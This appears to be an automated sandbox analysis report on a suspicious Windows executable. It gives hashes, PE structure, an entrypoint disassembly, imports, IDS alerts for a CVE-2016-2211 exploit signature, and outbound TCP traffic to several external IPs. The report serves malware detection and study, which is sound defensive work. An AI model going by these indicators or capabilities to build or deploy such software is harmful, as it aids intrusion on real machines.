                                                                                        Preview:y....I9OXn..A...s.67..cJ1...4QHVKI9OX64QHVKI9OX64QHVKI9OX6.QHVEV.AX.=.i.J..n.^]"h&9&^=9[.2)8%&Mo:S.#=8k Wo.ygq%9/,.BU<.QHVKI9O!7=.u6,../?..1/.Q.bVS.R.../?....w)^.._W9u6,.9OX64QHV..9O.75QA.F.9OX64QHV.I;NS7?QH.OI9OX64QHV.]9OX&4QH&OI9O.64AHVKK9O^64QHVKI?OX64QHVK9=OX44QHVKI;O..4QXVKY9OX6$QHFKI9OX6$QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64Qf".1MOX6..LVKY9OX`0QHFKI9OX64QHVKI9Ox641HVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX6

                                                                                        C:\Users\user\AppData\Local\Temp\F14431U2a

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\net.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.1209886597424439
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.513742342703609
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                        • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:XhAQ0Rk63O.exe
                                                                                        File size:1'330'101 bytes
                                                                                        MD5:1641128999c6968823ca0d92cb8f0ece
                                                                                        SHA1:eb766aacb3c3ee714f728dcddd4ac02168c1225e
                                                                                        SHA256:b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d
                                                                                        SHA512:fcacf0592eeb1cc29e18c41c7762557aa1fa72993a59ca78c033ed6f1e6448bbaf6a6aaa8a1b6644cf42838fc051ceee52ee5fd584e79d82b9cba9d6d48aea0a
                                                                                        SSDEEP:24576:ffmMv6Ckr7Mny5QLUwz9mShS6PrpFjkfmw+N+pa7IwPv:f3v+7/5QLpzPhVrpFjkfSN2if
                                                                                        TLSH:D455F112B7D680B6D9A338B5297BE32BEB3575190327C48BA7E01F779F211409B36361
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                        File Icon

                                                                                        Icon Hash:1733312925935517

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x416310
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007FA488E4556Ch
                                                                                        jmp 00007FA488E3933Eh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push edi
                                                                                        push esi
                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                        mov eax, ecx
                                                                                        mov edx, ecx
                                                                                        add eax, esi
                                                                                        cmp edi, esi
                                                                                        jbe 00007FA488E394CAh
                                                                                        cmp edi, eax
                                                                                        jc 00007FA488E3966Ah
                                                                                        cmp ecx, 00000100h
                                                                                        jc 00007FA488E394E1h
                                                                                        cmp dword ptr [004A94E0h], 00000000h
                                                                                        je 00007FA488E394D8h
                                                                                        push edi
                                                                                        push esi
                                                                                        and edi, 0Fh
                                                                                        and esi, 0Fh
                                                                                        cmp edi, esi
                                                                                        pop esi
                                                                                        pop edi
                                                                                        jne 00007FA488E394CAh
                                                                                        pop esi
                                                                                        pop edi
                                                                                        pop ebp
                                                                                        jmp 00007FA488E3992Ah
                                                                                        test edi, 00000003h
                                                                                        jne 00007FA488E394D7h
                                                                                        shr ecx, 02h
                                                                                        and edx, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007FA488E394ECh
                                                                                        rep movsd
                                                                                        jmp dword ptr [00416494h+edx*4]
                                                                                        nop
                                                                                        mov eax, edi
                                                                                        mov edx, 00000003h
                                                                                        sub ecx, 04h
                                                                                        jc 00007FA488E394CEh
                                                                                        and eax, 03h
                                                                                        add ecx, eax
                                                                                        jmp dword ptr [004163A8h+eax*4]
                                                                                        jmp dword ptr [004164A4h+ecx*4]
                                                                                        nop
                                                                                        jmp dword ptr [00416428h+ecx*4]
                                                                                        nop
                                                                                        mov eax, E4004163h
                                                                                        arpl word ptr [ecx+00h], ax
                                                                                        or byte ptr [ecx+eax*2+00h], ah
                                                                                        and edx, ecx
                                                                                        mov al, byte ptr [esi]
                                                                                        mov byte ptr [edi], al
                                                                                        mov al, byte ptr [esi+01h]
                                                                                        mov byte ptr [edi+01h], al
                                                                                        mov al, byte ptr [esi+02h]
                                                                                        shr ecx, 02h
                                                                                        mov byte ptr [edi+02h], al
                                                                                        add esi, 03h
                                                                                        add edi, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007FA488E3948Eh

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [ASM] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2005 build 50727
                                                                                        • [IMP] VS2005 build 50727
                                                                                        • [ASM] VS2008 build 21022
                                                                                        • [RES] VS2008 build 21022
                                                                                        • [LNK] VS2008 SP1 build 30729

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                        RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                        RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                        RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                        RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                        RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                        RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                        RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                        RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                        RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                        RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                        RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                        Imports

                                                                                        DLLImport
                                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                        GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                        OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishGreat Britain
                                                                                        EnglishUnited States

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-06T15:59:25.999363+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849706TCP
                                                                                        2024-11-06T16:00:03.959754+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849712TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 6, 2024 15:59:37.977380991 CET4970780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 15:59:37.982327938 CET80497073.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 15:59:37.982498884 CET4970780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 15:59:37.990912914 CET4970780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 15:59:37.995754957 CET80497073.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 15:59:38.633110046 CET80497073.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 15:59:38.633387089 CET80497073.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 15:59:38.633447886 CET4970780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 15:59:38.636748075 CET4970780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 15:59:38.641554117 CET80497073.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 15:59:53.748533010 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:53.753448963 CET8049708217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:53.753525972 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:53.764880896 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:53.769887924 CET8049708217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:54.571353912 CET8049708217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:54.622786045 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:54.696640015 CET8049708217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:54.696717024 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:55.279117107 CET4970880192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:56.306729078 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:56.311724901 CET8049709217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:56.311805964 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:56.323050022 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:56.327888966 CET8049709217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:57.146554947 CET8049709217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:57.201071978 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:57.257370949 CET8049709217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:57.257507086 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:57.826009035 CET4970980192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:58.849003077 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:58.853851080 CET8049710217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:58.853957891 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:58.867937088 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:58.872935057 CET8049710217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:58.873042107 CET8049710217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:59.691667080 CET8049710217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:59.734591961 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 15:59:59.786740065 CET8049710217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 15:59:59.786794901 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:00.372843981 CET4971080192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:01.391654968 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:01.396634102 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:01.396747112 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:01.404284954 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:01.409249067 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:02.213911057 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:02.213989019 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:02.214174032 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:02.324371099 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:02.324546099 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:02.325453997 CET4971180192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:00:02.330394030 CET8049711217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:00:07.530922890 CET4971380192.168.2.8199.59.243.227
                                                                                        Nov 6, 2024 16:00:07.535856962 CET8049713199.59.243.227192.168.2.8
                                                                                        Nov 6, 2024 16:00:07.535989046 CET4971380192.168.2.8199.59.243.227
                                                                                        Nov 6, 2024 16:00:07.594315052 CET4971380192.168.2.8199.59.243.227
                                                                                        Nov 6, 2024 16:00:07.599334955 CET8049713199.59.243.227192.168.2.8
